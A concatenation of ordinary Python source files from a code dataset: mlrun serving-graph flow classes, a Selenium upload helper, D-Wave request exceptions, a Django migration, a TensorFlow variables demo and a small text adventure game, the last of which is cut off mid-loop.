    def run(self, event, *args, **kwargs):
        """push the event body to the stream (if configured) and terminate it"""
        data = event.body
        if not data:
            return event

        if self._stream:
            self._stream.push({"id": event.id, "body": data, "path": event.path})
            event.terminated = True
            event.body = None
        return event
class FlowStep(BaseStep):
    """flow step, represent a workflow or DAG"""

    kind = "flow"
    _dict_fields = BaseStep._dict_fields + [
        "steps",
        "engine",
        "default_final_step",
    ]

    # TODO - remove once "states" is fully deprecated
    @classmethod
    def from_dict(cls, struct=None, fields=None, deprecated_fields: dict = None):
        deprecated_fields = deprecated_fields or {}
        deprecated_fields.update(
            {"states": "steps", "default_final_state": "default_final_step"}
        )
        return super().from_dict(
            struct, fields=fields, deprecated_fields=deprecated_fields
        )

    def __init__(
        self,
        name=None,
        steps=None,
        after: list = None,
        engine=None,
        final_step=None,
        # TODO - remove once usage of "state" is fully deprecated
        states=None,
        final_state=None,
    ):
        super().__init__(name, after)
        if states:
            warnings.warn(
                "The states parameter is deprecated. Use steps instead",
                # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
                PendingDeprecationWarning,
            )
        steps = steps or states
        if final_state:
            warnings.warn(
                "The final_state parameter is deprecated. Use final_step instead",
                # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
                PendingDeprecationWarning,
            )
        final_step = final_step or final_state
        self._steps = None
        self.steps = steps
        self.engine = engine  # "sync" or async (storey) engine
        # TODO - remove use of START_FROM_STATE once it's fully deprecated.
        self.from_step = os.environ.get("START_FROM_STEP", None) or os.environ.get(
            "START_FROM_STATE", None
        )
        self.final_step = final_step
        self._last_added = None  # last step added, used for the "$prev" shortcut
        self._controller = None  # storey flow controller (async engine only)
        self._wait_for_result = False
        self._source = None  # optional custom async source
        self._start_steps = []  # steps with no upstream (entry points)

    def get_children(self):
        return self._steps.values()

    @property
    def steps(self):
        """child (workflow) steps"""
        return self._steps

    @property
    def states(self):
        """deprecated alias of steps"""
        warnings.warn(
            "This property is deprecated. Use steps instead",
            # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
            PendingDeprecationWarning,
        )
        return self._steps

    @property
    def controller(self):
        """async (storey) flow controller"""
        return self._controller

    @steps.setter
    def steps(self, steps):
        self._steps = ObjectDict.from_dict(classes_map, steps, "task")

    @states.setter
    def states(self, states):
        """deprecated alias of the steps setter"""
        warnings.warn(
            "This property is deprecated. Use steps instead",
            # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
            PendingDeprecationWarning,
        )
        self._steps = ObjectDict.from_dict(classes_map, states, "task")

    def add_step(
        self,
        class_name=None,
        name=None,
        handler=None,
        after=None,
        before=None,
        graph_shape=None,
        function=None,
        full_event: bool = None,
        input_path: str = None,
        result_path: str = None,
        **class_args,
    ):
        """add task, queue or router step/class to the flow

        use after/before to insert into a specific location

        example:
            graph = fn.set_topology("flow", exist_ok=True)
            graph.add_step(class_name="Chain", name="s1")
            graph.add_step(class_name="Chain", name="s3", after="$prev")
            graph.add_step(class_name="Chain", name="s2", after="s1", before="s3")

        :param class_name:  class name or step object to build the step from
                            for router steps the class name should start with '*'
                            for queue/stream step the class should be '>>' or '$queue'
        :param name:        unique name (and path) for the child step, default is class name
        :param handler:     class/function handler to invoke on run/event
        :param after:       the step name this step comes after
                            can use $prev to indicate the last added step
        :param before:      string or list of next step names that will run after this step
        :param graph_shape: graphviz shape name
        :param function:    function this step should run in
        :param full_event:  this step accepts the full event (not just body)
        :param input_path:  selects the key/path in the event to use as input to the step
                            this require that the event body will behave like a dict, example:
                            event: {"data": {"a": 5, "b": 7}}, input_path="data.b" means the step will
                            receive 7 as input
        :param result_path: selects the key/path in the event to write the results to
                            this require that the event body will behave like a dict, example:
                            event: {"x": 5} , result_path="y" means the output of the step will be written
                            to event["y"] resulting in {"x": 5, "y": <result>}
        :param class_args:  class init arguments
        """

        name, step = params_to_step(
            class_name,
            name,
            handler,
            graph_shape=graph_shape,
            function=function,
            full_event=full_event,
            input_path=input_path,
            result_path=result_path,
            class_args=class_args,
        )

        self.insert_step(name, step, after, before)
        return step

    def insert_state(self, key, state, after, before=None):
        """deprecated alias of insert_step()"""
        warnings.warn(
            "This method is deprecated. Use insert_step instead",
            # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
            PendingDeprecationWarning,
        )
        return self.insert_step(key, state, after, before)

    def insert_step(self, key, step, after, before=None):
        """insert step object into the flow, specify before and after"""

        step = self._steps.update(key, step)
        step.set_parent(self)

        if after == "$prev" and len(self._steps) == 1:
            after = None

        previous = ""
        if after:
            if after == "$prev" and self._last_added:
                previous = self._last_added.name
            else:
                if after not in self._steps.keys():
                    raise MLRunInvalidArgumentError(
                        f"cant set after, there is no step named {after}"
                    )
                previous = after
            step.after_step(previous)

        if before:
            if before not in self._steps.keys():
                raise MLRunInvalidArgumentError(
                    f"cant set before, there is no step named {before}"
                )
            if before == step.name or before == previous:
                raise GraphError(
                    f"graph loop, step {before} is specified in before and/or after {key}"
                )
            self[before].after_step(step.name)
        self._last_added = step
        return step

    def clear_children(self, steps: list = None, states: list = None):
        """remove some or all of the states, empty/None for all"""
        if states:
            warnings.warn(
                "This states parameter is deprecated. Use steps instead",
                # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
                PendingDeprecationWarning,
            )
        steps = steps or states
        if not steps:
            steps = self._steps.keys()
        for key in steps:
            del self._steps[key]

    def __getitem__(self, name):
        return self._steps[name]

    def __setitem__(self, name, step):
        self.add_step(name, step)

    def __delitem__(self, key):
        del self._steps[key]

    def __iter__(self):
        yield from self._steps.keys()

    def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
        """validate the graph and init all child steps (and the async flow if needed)"""
        self.context = context
        self.check_and_process_graph()

        for step in self._steps.values():
            step.set_parent(self)
            step.init_object(context, namespace, mode, reset=reset)
        self._set_error_handler()
        self._post_init(mode)

        if self.engine != "sync":
            self._build_async_flow()

    def check_and_process_graph(self, allow_empty=False):
        """validate correct graph layout and initialize the .next links"""

        if self.is_empty() and allow_empty:
            self._start_steps = []
            return [], None, []

        def has_loop(step, previous):
            # recursive DFS over "after" links looking for a cycle
            for next_step in step.after or []:
                if next_step in previous:
                    return step.name
                downstream = has_loop(self[next_step], previous + [next_step])
                if downstream:
                    return downstream
            return None

        start_steps = []
        for step in self._steps.values():
            step._next = None
            if step.after:
                loop_step = has_loop(step, [])
                if loop_step:
                    raise GraphError(
                        f"Error, loop detected in step {loop_step}, graph must be acyclic (DAG)"
                    )
            else:
                start_steps.append(step.name)

        responders = []
        for step in self._steps.values():
            if hasattr(step, "responder") and step.responder:
                responders.append(step.name)
            if step.on_error and step.on_error in start_steps:
                # error handlers are not entry points
                start_steps.remove(step.on_error)
            if step.after:
                prev_step = step.after[0]
                self[prev_step].set_next(step.name)
        if self.on_error and self.on_error in start_steps:
            start_steps.remove(self.on_error)

        if (
            len(responders) > 1
        ):  # should not have multiple steps which respond to request
            raise GraphError(
                f'there are more than one responder steps in the graph ({",".join(responders)})'
            )

        if self.from_step:
            if self.from_step not in self.steps:
                raise GraphError(
                    f"from_step ({self.from_step}) specified and not found in graph steps"
                )
            start_steps = [self.from_step]

        self._start_steps = [self[name] for name in start_steps]

        def get_first_function_step(step, current_function):
            # find the first step which belongs to the function
            if (
                hasattr(step, "function")
                and step.function
                and step.function == current_function
            ):
                return step
            for item in step.next or []:
                next_step = self[item]
                returned_step = get_first_function_step(next_step, current_function)
                if returned_step:
                    return returned_step

        current_function = get_current_function(self.context)
        if current_function and current_function != "*":
            new_start_steps = []
            for from_step in self._start_steps:
                step = get_first_function_step(from_step, current_function)
                if step:
                    new_start_steps.append(step)
            if not new_start_steps:
                raise GraphError(
                    f"did not find steps pointing to current function ({current_function})"
                )
            self._start_steps = new_start_steps

        if self.engine == "sync" and len(self._start_steps) > 1:
            raise GraphError(
                "sync engine can only have one starting step (without .after)"
            )

        default_final_step = None
        if self.final_step:
            if self.final_step not in self.steps:
                raise GraphError(
                    f"final_step ({self.final_step}) specified and not found in graph steps"
                )
            default_final_step = self.final_step
        elif len(self._start_steps) == 1:
            # find the final step in case if a simple sequence of steps
            next_obj = self._start_steps[0]
            while next_obj:
                next = next_obj.next
                if not next:
                    default_final_step = next_obj.name
                    break
                next_obj = self[next[0]] if len(next) == 1 else None

        return self._start_steps, default_final_step, responders

    def set_flow_source(self, source):
        """set the async flow (storey) source"""
        self._source = source

    def _build_async_flow(self):
        """initialize and build the async/storey DAG"""

        def process_step(state, step, root):
            # recursively link storey objects following the .next chain
            if not state._is_local_function(self.context):
                return
            for item in state.next or []:
                next_state = root[item]
                if next_state.async_object:
                    next_step = step.to(next_state.async_object)
                    process_step(next_state, next_step, root)

        default_source, self._wait_for_result = _init_async_objects(
            self.context, self._steps.values()
        )

        source = self._source or default_source
        for next_state in self._start_steps:
            next_step = source.to(next_state.async_object)
            process_step(next_state, next_step, self)

        for step in self._steps.values():
            # add error handler hooks
            if (step.on_error or self.on_error) and step.async_object:
                error_step = self._steps[step.on_error or self.on_error]
                # never set a step as its own error handler
                if step != error_step:
                    step.async_object.set_recovery_step(error_step.async_object)

        self._controller = source.run()

    def get_queue_links(self):
        """return dict of function and queue its listening on, for building stream triggers"""
        links = {}
        for step in self.get_children():
            if step.kind == StepKinds.queue:
                for item in step.next or []:
                    next_step = self[item]
                    if not next_step.function:
                        raise GraphError(
                            f"child function name must be specified in steps ({next_step.name}) which follow a queue"
                        )

                    if next_step.function in links:
                        raise GraphError(
                            f"function ({next_step.function}) cannot read from multiple queues"
                        )
                    links[next_step.function] = step
        return links

    def init_queues(self):
        """init/create the streams used in this flow"""
        for step in self.get_children():
            if step.kind == StepKinds.queue:
                step.init_object(self.context, None)

    def is_empty(self):
        """is the graph empty (no child steps)"""
        return len(self.steps) == 0

    @staticmethod
    async def _await_and_return_id(awaitable, event):
        # wait for async completion, then respond with just the event id
        await awaitable
        event = copy(event)
        event.body = {"id": event.id}
        return event

    def run(self, event, *args, **kwargs):
        """run the flow on an event (async via storey controller, or sync step-by-step)"""

        if self._controller:
            # async flow (using storey)
            event._awaitable_result = None
            if config.datastore.async_source_mode == "enabled":
                resp_awaitable = self._controller.emit(
                    event, await_result=self._wait_for_result
                )
                if self._wait_for_result:
                    return resp_awaitable
                return self._await_and_return_id(resp_awaitable, event)
            else:
                resp = self._controller.emit(
                    event, return_awaitable_result=self._wait_for_result
                )
                if self._wait_for_result and resp:
                    return resp.await_result()
            event = copy(event)
            event.body = {"id": event.id}
            return event

        if len(self._start_steps) == 0:
            return event
        next_obj = self._start_steps[0]
        while next_obj:
            try:
                event = next_obj.run(event, *args, **kwargs)
            except Exception as exc:
                self._log_error(event, exc, failed_step=next_obj.name)
                handled = self._call_error_handler(event, exc)
                if not handled:
                    raise exc
                event.terminated = True
                return event

            if hasattr(event, "terminated") and event.terminated:
                return event
            next = next_obj.next
            if next and len(next) > 1:
                raise GraphError(
                    f"synchronous flow engine doesnt support branches use async, step={next_obj.name}"
                )
            next_obj = self[next[0]] if next else None
        return event

    def wait_for_completion(self):
        """wait for completion of run in async flows"""
        if self._controller:
            if hasattr(self._controller, "terminate"):
                self._controller.terminate()
            return self._controller.await_termination()

    def plot(self, filename=None, format=None, source=None, targets=None, **kw):
        """plot/save graph using graphviz"""
        return _generate_graphviz(
            self,
            _add_graphviz_flow,
            filename,
            format,
            source=source,
            targets=targets,
            **kw,
        )
class RootFlowStep(FlowStep):
    """root flow step"""

    kind = "root"
    # serialized fields; "final_step" replaces the deprecated "final_state"
    # accepted by from_dict() below
    _dict_fields = ["steps", "engine", "final_step", "on_error"]

    # TODO - remove once "final_state" is fully deprecated
    @classmethod
    def from_dict(cls, struct=None, fields=None):
        # map the legacy "final_state" key to "final_step" when loading
        return super().from_dict(
            struct, fields=fields, deprecated_fields={"final_state": "final_step"}
        )
# registry mapping a serialized step "kind" string to its step class;
# consulted by params_to_step() when deserializing graph definitions
classes_map = {
    "task": TaskStep,
    "router": RouterStep,
    "flow": FlowStep,
    "queue": QueueStep,
}
def get_current_function(context):
    """Return the current function name from `context` ("" when unset or absent)."""
    current = getattr(context, "current_function", None) if context else None
    return current or ""
def _add_graphviz_router(graph, step, source=None, **kwargs):
if source:
graph.node("_start", source.name, shape=source.shape, style="filled")
graph.edge("_start", step.fullname)
graph.node(step.fullname, label=step.name, shape=step.get_shape())
for route in step.get_children():
graph.node(route.fullname, label=route.name, shape=route.get_shape())
graph.edge(step.fullname, route.fullname)
def _add_graphviz_flow(
    graph, step, source=None, targets=None,
):
    """Render a flow step, its children and optional targets into `graph`."""
    start_steps, default_final_step, responders = step.check_and_process_graph(
        allow_empty=True
    )
    # the source node feeds every start step of the flow
    graph.node("_start", source.name, shape=source.shape, style="filled")
    for start_step in start_steps:
        graph.edge("_start", start_step.fullname)
    for child in step.get_children():
        kind = child.kind
        if kind == StepKinds.router:
            # routers are drawn as a sub-graph (cluster) holding their routes
            with graph.subgraph(name="cluster_" + child.fullname) as sg:
                _add_graphviz_router(sg, child)
        else:
            graph.node(child.fullname, label=child.name, shape=child.get_shape())
        after = child.after or []
        for item in after:
            previous_object = step[item]
            # edges leaving a router cluster must name the cluster via ltail
            kw = (
                {"ltail": "cluster_" + previous_object.fullname}
                if previous_object.kind == StepKinds.router
                else {}
            )
            graph.edge(previous_object.fullname, child.fullname, **kw)
        if child.on_error:
            # dashed edge marks the error-handler route
            graph.edge(child.fullname, child.on_error, style="dashed")
    # draw targets after the last step (if specified)
    if targets:
        for target in targets or []:
            graph.node(target.fullname, label=target.name, shape=target.get_shape())
            last_step = target.after or default_final_step
            if last_step:
                graph.edge(last_step, target.fullname)
def _generate_graphviz(
    step, renderer, filename=None, format=None, source=None, targets=None, **kw,
):
    """Build a graphviz Digraph for `step` using `renderer`; optionally
    render it to `filename` (format from the arg or the file suffix)."""
    try:
        from graphviz import Digraph
    except ImportError:
        raise ImportError(
            'graphviz is not installed, run "pip install graphviz" first!'
        )
    # NOTE(review): the Digraph is created with format="jpg" but render()
    # below passes its own format (defaulting to "png") - confirm the
    # initial value is intentional
    graph = Digraph("mlrun-flow", format="jpg")
    graph.attr(compound="true", **kw)
    source = source or BaseStep("start", shape="egg")
    renderer(graph, step, source=source, targets=targets)
    if filename:
        suffix = pathlib.Path(filename).suffix
        if suffix:
            # strip the suffix from the filename and reuse it as the format
            filename = filename[: -len(suffix)]
            format = format or suffix[1:]
        format = format or "png"
        graph.render(filename, format=format)
    return graph
def graph_root_setter(server, graph):
    """set graph root object from class or dict"""
    if graph:
        # accept either a serialized dict or a step object exposing `kind`
        if isinstance(graph, dict):
            kind = graph.get("kind")
        elif hasattr(graph, "kind"):
            kind = graph.kind
        else:
            raise MLRunInvalidArgumentError("graph must be a dict or a valid object")
        # only router steps or root flow steps may serve as the graph root
        if kind == StepKinds.router:
            server._graph = server._verify_dict(graph, "graph", RouterStep)
        elif not kind or kind == StepKinds.root:
            server._graph = server._verify_dict(graph, "graph", RootFlowStep)
        else:
            raise GraphError(f"illegal root step {kind}")
def get_name(name, class_name):
    """Resolve a task name: explicit `name` wins, else derive it from
    `class_name` (a class object or a string); raise when neither is given."""
    if name:
        return name
    if not class_name:
        raise MLRunInvalidArgumentError("name or class_name must be provided")
    return class_name.__name__ if isinstance(class_name, type) else class_name
def params_to_state(
    class_name,
    name,
    handler=None,
    graph_shape=None,
    function=None,
    full_event=None,
    class_args=None,
):
    """Deprecated alias of :func:`params_to_step` (kept for backwards
    compatibility); forwards all arguments unchanged."""
    warnings.warn(
        # fixed: the message previously pointed at a nonexistent "param_to_step"
        "This method is deprecated. Use params_to_step instead",
        # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
        PendingDeprecationWarning,
    )
    return params_to_step(
        class_name, name, handler, graph_shape, function, full_event, class_args
    )
def params_to_step(
    class_name,
    name,
    handler=None,
    graph_shape=None,
    function=None,
    full_event=None,
    input_path: str = None,
    result_path: str = None,
    class_args=None,
):
    """return step object from provided params or classes/objects

    Accepts, via `class_name`: an object with to_dict() (re-hydrated as its
    serialized kind), the queue markers ">>"/"$queue", a "*Class" router
    spec, or a plain class name/handler for a task step.
    Returns a (name, step) tuple.
    """
    if class_name and hasattr(class_name, "to_dict"):
        # already a step-like object: rebuild it from its serialized form
        struct = class_name.to_dict()
        kind = struct.get("kind", StepKinds.task)
        name = name or struct.get("name", struct.get("class_name"))
        cls = classes_map.get(kind, RootFlowStep)
        step = cls.from_dict(struct)
        step.function = function
        step.full_event = full_event or step.full_event
        step.input_path = input_path or step.input_path
        step.result_path = result_path or step.result_path
    elif class_name and class_name in [">>", "$queue"]:
        # queue step: requires an explicit stream path and a name
        if "path" not in class_args:
            raise MLRunInvalidArgumentError(
                "path=<stream path or None> must be specified for queues"
            )
        if not name:
            raise MLRunInvalidArgumentError("queue name must be specified")
        step = QueueStep(name, **class_args)
    elif class_name and class_name.startswith("*"):
        # "*Class" prefix marks a router step
        routes = class_args.get("routes", None)
        class_name = class_name[1:]
        name = get_name(name, class_name or "router")
        step = RouterStep(
            class_name,
            class_args,
            handler,
            name=name,
            function=function,
            routes=routes,
            input_path=input_path,
            result_path=result_path,
        )
    elif class_name or handler:
        # default: a regular task step
        name = get_name(name, class_name)
        step = TaskStep(
            class_name,
            class_args,
            handler,
            name=name,
            function=function,
            full_event=full_event,
            input_path=input_path,
            result_path=result_path,
        )
    else:
        raise MLRunInvalidArgumentError("class_name or handler must be provided")
    if graph_shape:
        step.shape = graph_shape
    return name, step
def _init_async_objects(context, steps):
    """Wrap each local step with its storey async object and return
    (default_source, wait_for_result) for the async (storey) engine."""
    try:
        import storey
    except ImportError:
        raise GraphError("storey package is not installed, use pip install storey")
    wait_for_result = False
    for step in steps:
        if hasattr(step, "async_object") and step._is_local_function(context):
            if step.kind == StepKinds.queue:
                # in mock mode a queue with downstream steps is bypassed
                skip_stream = context.is_mock and step.next
                if step.path and not skip_stream:
                    stream_path = step.path
                    endpoint = None
                    if "://" in stream_path:
                        # full URL: split into endpoint + in-cluster path
                        endpoint, stream_path = parse_v3io_path(step.path)
                        stream_path = stream_path.strip("/")
                    step._async_object = storey.StreamTarget(
                        storey.V3ioDriver(endpoint), stream_path
                    )
                else:
                    # pathless/mocked queue degenerates to a pass-through
                    step._async_object = storey.Map(lambda x: x)
            elif not step.async_object or not hasattr(step.async_object, "_outlets"):
                # if regular class, wrap with storey Map
                step._async_object = storey.Map(
                    step._handler,
                    full_event=step.full_event or step._call_with_event,
                    input_path=step.input_path,
                    result_path=step.result_path,
                    name=step.name,
                    context=context,
                )
            if not step.next and hasattr(step, "responder") and step.responder:
                # if responder step (return result), add Complete()
                step.async_object.to(storey.Complete(full_event=True))
                wait_for_result = True
    default_source = storey.SyncEmitSource()
    return default_source, wait_for_result
|
22,019 | 93e52c034987a91a269758207fb5d59d0d9c80b1 | import Class.SeleniumBrowser
import Module.Algorithms
import Module.Utility
import Module.logger
import Module.getObject
import Module.CleanUp
import Module.Report
import Class.UserDefinedException
def uploadFile(driverObject,uploadButtonName,filename,position=1):
    """Upload `filename` through the page's upload control.

    Strategy: first try the object repository ("uploadbutton" entry) and
    send the file path directly; if that fails, locate the button by
    algorithm (optionally at `position`) and send the path to its inner
    <input> element. On final failure, report, kill processes and raise.
    """
    Excep = Class.UserDefinedException.UserDefinedException()
    filePath = Module.Utility.getFileTransferPath(filename)
    success = 0
    # NOTE(review): only logs when the name is missing; execution continues
    if uploadButtonName == None:
        Module.logger.ERROR("Button name not provided")
    obj = Module.getObject.getObjByRepo(driverObject,"uploadbutton",uploadButtonName)
    if obj != None:
        try:
            obj.send_keys(filePath)
            Module.logger.INFO("File with name" + filePath + " is uploaded")
            success = 1
        except:
            # NOTE(review): bare except hides the real failure; the repo
            # path is best-effort and we fall through to the algorithm below
            Module.logger.ERROR("File with name" + filePath + " is not uploaded")
    else:
        Module.logger.INFO("Object " +uploadButtonName+" is not found in Repository")
    if success == 0:
        # fallback: find the visible button and type into its <input> child
        if position == 1:
            obj = Module.getObject.getObjByAlgo(driverObject,"button",uploadButtonName)
        else:
            obj = Module.getObject.getObjByAlgoOnPosition(driverObject,"button",uploadButtonName,position)
        if obj != None:
            try:
                inputObj = obj.find_element_by_tag_name("input")
                inputObj.send_keys(filePath)
                Module.logger.INFO("File with name" + filePath + " is uploaded")
            except:
                # Clean up before raising exception
                Module.Report.Failure(driverObject, "File" + filePath + " is not uploaded")
                Module.CleanUp.killAllProcess()
                Excep.raiseException("File with name:" + filePath + " is not uploaded")
        else:
            Module.Report.Failure(driverObject, "No Object found for upload button "+uploadButtonName)
            Excep.raiseException("No Object found for upload button "+uploadButtonName)
22,020 | d3d6d52db4d2bdaaeb2c1f301214bf31fdd8c5d1 | # Copyright 2021 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
class RequestError(requests.exceptions.RequestException):
    """Generic SAPI request error"""

    error_msg = None
    error_code = None

    def __init__(self, *args, **kwargs):
        # Accept `error_msg`/`error_code` keyword overrides. The exception
        # message falls back, in order of precedence, to: positional args,
        # the (class or keyword) `error_msg`, and finally the docstring.
        self.error_msg = kwargs.pop('error_msg', self.error_msg)
        self.error_code = kwargs.pop('error_code', self.error_code)
        if not args:
            fallback = self.error_msg if self.error_msg is not None else self.__doc__
            args = (fallback, )
        super().__init__(*args, **kwargs)
# One subclass per SAPI failure mode; each class docstring doubles as the
# default exception message (see the fallback in RequestError.__init__),
# so the docstrings below must not be reworded casually.
class ResourceBadRequestError(RequestError):
    """Resource failed to parse the request"""

class ResourceAuthenticationError(RequestError):
    """Access to resource not authorized: token is invalid or missing"""

class ResourceAccessForbiddenError(RequestError):
    """Access to resource forbidden"""

class ResourceNotFoundError(RequestError):
    """Resource not found"""

class ResourceConflictError(RequestError):
    """Conflict in the current state of the resource"""

class ResourceLimitsExceededError(RequestError):
    """Number of resource requests exceed the permitted limit"""

class ResourceBadResponseError(RequestError):
    """Unexpected resource response"""

class InternalServerError(RequestError):
    """internal server error occurred while request handling."""

class RequestTimeout(RequestError):
    """API request timed out"""
|
22,021 | 163cad7c283c76f483e0cca299d6fd037a64d4e2 | from .stock import Stock
class PyIEX(object):
    """Facade exposing IEX API endpoint groups (currently only stocks)."""

    def __init__(self):
        # single shared Stock endpoint instance, exposed read-only below
        self._stock = Stock()

    @property
    def stock(self):
        """Read-only accessor for the Stock endpoint wrapper."""
        return self._stock
|
22,022 | 35b044367b43620391ee319225c013f17a0859d9 | # Generated by Django 2.2.7 on 2019-11-18 19:13
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds a `subtitle` CharField (with a default)
    to the `note` model. Do not edit by hand beyond what Django expects."""

    dependencies = [
        ('notes', '0003_personalnote'),
    ]

    operations = [
        migrations.AddField(
            model_name='note',
            name='subtitle',
            field=models.CharField(default='default subtitle', max_length=200),
        ),
    ]
|
22,023 | ff1d2da336d3dadf5e95a0e861509396bdb91a56 | # colorselector
import os,sys
from math import sqrt
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from brush_class import Brush
from random import randint as random
class colorSelector(Brush):
    # Canvas tool (not a paint brush): picks up the color under the cursor
    # and makes it the canvas's active color.
    displayName = "Color Picker"
    description = "Selects a color from the Canvas";
    type = "TOOL";
    cursor = "target";

    def __init__(this, canvasobject):
        # `this` is the instance (author's naming for `self`)
        this.canvas = canvasobject;
        this.setColor = False;
        this.color = None;
        # instance copies shadow the class-level attributes above
        this.type = "TOOL";
        this.displayName= "Color Picker";
        this.description= "Selects a color from the Canvas";

    def leaveStamp(this, x, y):
        # only pick when the pixel is not fully transparent (alpha != 0)
        if(not this.canvas.getColorAt(x,y)[3] == 0):
            this.canvas.setColor(this.canvas.getColorAt(x,y));
            this.canvas.tool_window.updateColor();
        return True;

    def identifier(this):
        # stable key used to identify this tool
        return "colorSelector";
22,024 | ff5e94efc4445e1ca8fc4ffb2a6ccfb2414c17f5 | import tensorflow as tf
import os
import cProfile
def variable_turn_off_gradient():
    """Demonstrate a variable excluded from gradient tracking via trainable=False."""
    step_counter = tf.Variable(1, trainable=False)
    print(step_counter)
def variable_placing():
    """Demonstrate explicit device placement: create tensors and matmul on CPU:0."""
    with tf.device('CPU:0'):
        # Create some tensors
        a = tf.Variable([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
        b = tf.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
        c = tf.matmul(a, b)
    print(c)
if __name__ == '__main__':
    """
    recommended way to represent shared, persistent state your program manipulates
    Higher level libraries like tf.keras use tf.Variable to store model parameters
    A variable looks and acts like a tensor, and, in fact, is a data structure backed by a tf.Tensor
    """
    # basic creation and inspection of a tf.Variable
    my_tensor = tf.constant([[1.0, 2.0], [3.0, 4.0]])
    my_variable = tf.Variable(my_tensor)
    print("Shape: ", my_variable.shape)
    print("DType: ", my_variable.dtype)
    print("As NumPy: ", my_variable.numpy())
    print("\nViewed as a tensor:", tf.convert_to_tensor(my_variable))
    print("\nIndex of highest value:", tf.argmax(my_variable))
    # This creates a new tensor; it does not reshape the variable.
    print("\nCopying and reshaping: ", tf.reshape(my_variable, [1, 4]))
    # Variables can be all kinds of types, just like tensors
    bool_variable = tf.Variable([False, False, False, True])
    complex_variable = tf.Variable([5 + 4j, 6 + 1j])
    # assign: mutates in place, keeping dtype and shape
    a = tf.Variable([2.0, 3.0])
    a.assign([1, 2])  # This will keep the same dtype, float32
    # a.assign([1.0, 2.0, 3.0])  # Not allowed as it resizes the variable
    # copy, two variables will not share the same memory
    a = tf.Variable([2.0, 3.0])
    b = tf.Variable(a)  # Create b based on the value of a
    a.assign([5, 6])
    print(a.numpy())  # [5. 6.]
    print(b.numpy())  # [2. 3.]
    # in-place add/subtract return the updated variable
    print(a.assign_add([2, 3]).numpy())  # [7. 9.]
    print(a.assign_sub([7, 9]).numpy())  # [0. 0.]
    variable_turn_off_gradient()
    variable_placing()
|
22,025 | e5f29a9fb7c2d4106d32342267a4290ff0ae999f | class Player:
    def __init__(self, name, room):
        # name: player's display name; room: current room number (game
        # starts in room 1); moves: successful-move counter shown at quit.
        self.name = name
        self.room = room
        self.moves = 0
# Your code works great for allowing the user to navigate to the different rooms in your adventure game. These comments
# are suggestions for how you could potentially condense your code, allowing you to reuse some parts of your code.
# Instead of creating four different Room classes, you could try creating one Room class. Then, you could initialize
# four room objects, by passing in values to the constructor of the Room class that make each room different. Here is an
# example of how to do this:
#
# class Room(): # Probably do not want to inherit Player in this class, because Room is not a "type of" Player.
# def __init__(self, room, direction1, neighbor1, direction2, neighbor2):
# self.room = room
# self.direction1 = direction1
# self.neighbor1 = neighbor1
# self.direction2 = direction2
# self.neighbor2 = neighbor2
#
# # The code below uses the class variables defined above in the return message, instead of hardcoding the message.
# def __repr__(self):
# return (f"Welcome to Room {self.room}. Use {self.direction1} to move to Room {self.neighbor1}, or "
# f"{self.direction2} to move to Room {self.neighbor2}.")
# Four hard-coded rooms. NOTE(review): inheriting Player looks accidental -
# a Room is not a kind of Player (see the refactor suggestion in the
# comments above); kept as-is to preserve behavior.
class Room_1(Player):
    def __init__(self):
        self.room = 1

    def __repr__(self):
        return "Welcome to Room 1. Use d to move to Room 2, or s to move to Room 3."

class Room_2(Player):
    def __init__(self):
        self.room = 2

    def __repr__(self):
        return "Welcome to Room 2. Use a to move to Room 1, or s to move to Room 4."

class Room_3(Player):
    def __init__(self):
        self.room = 3

    def __repr__(self):
        return "Welcome to Room 3. Use w to move to Room 1, or d to move to Room 4."

class Room_4(Player):
    def __init__(self):
        self.room = 4

    def __repr__(self):
        return "Welcome to Room 4. Use w to move to Room 2, or a to move to Room 3."
class Game:
    """Interactive four-room adventure: prompts for the player name, then
    loops on w/a/s/d moves (q quits), printing the room banner after each
    successful move and the move count at the end."""

    def __init__(self):
        name = input("What is your name, adventurer? ")
        self.player = Player(name, 1)

    def play_game(self):
        # Instead of creating four room variables here, you could create a "rooms" dictionary, as shown below. This
        # would let you access any room object by using its index number. For example, "rooms[1]" would give you the
        # Room object for room 1:
        #
        # rooms = {1: Room(room=1, direction1="d", neighbor1=2, direction2="s", neighbor2=3),
        #          2: Room(room=2, direction1="a", neighbor1=1, direction2="s", neighbor2=4),
        #          3: Room(room=3, direction1="w", neighbor1=1, direction2="d", neighbor2=4),
        #          4: Room(room=4, direction1="w", neighbor1=2, direction2="a", neighbor2=3)}
        # current_room = rooms[1]
        room_1 = Room_1()
        room_2 = Room_2()
        room_3 = Room_3()
        room_4 = Room_4()
        # `room` tracks the current room NUMBER; printing a Room object
        # below relies on its __repr__ banner
        room = room_1.room
        game_active = True
        print("Welcome to Adventure, {}!".format(self.player.name))
        print("There are four rooms that you can explore. The rooms a laid out as follows:")
        print("Top Left: Room 1    Top Right: Room 2")
        print("Bottom Left: Room 3    Bottom Right: Room 4")
        print("Your adventure starts in room number 1.")
        print("")
        while game_active:
            move = input("Use w, a, s, and d to move. Type q to quit the game.")
            print("")
            if move == "q".lower():
                print("Game over!")
                print("You made {} moves.".format(self.player.moves))
                game_active = False
            # Lastly, you could replace the "elif" conditions in your code below that start with "elif move == ", by
            # using the commented code below one time. This code uses the "rooms" dictionary from the previous comment.
            #
            # elif move.lower() != current_room.direction1 and move.lower() != current_room.direction2:
            #     print("There's nowhere to go! Try a different direction.")
            #     print("")
            # elif move.lower() == current_room.direction1:
            #     current_room = rooms[current_room.neighbor1]
            #     self.player.moves += 1
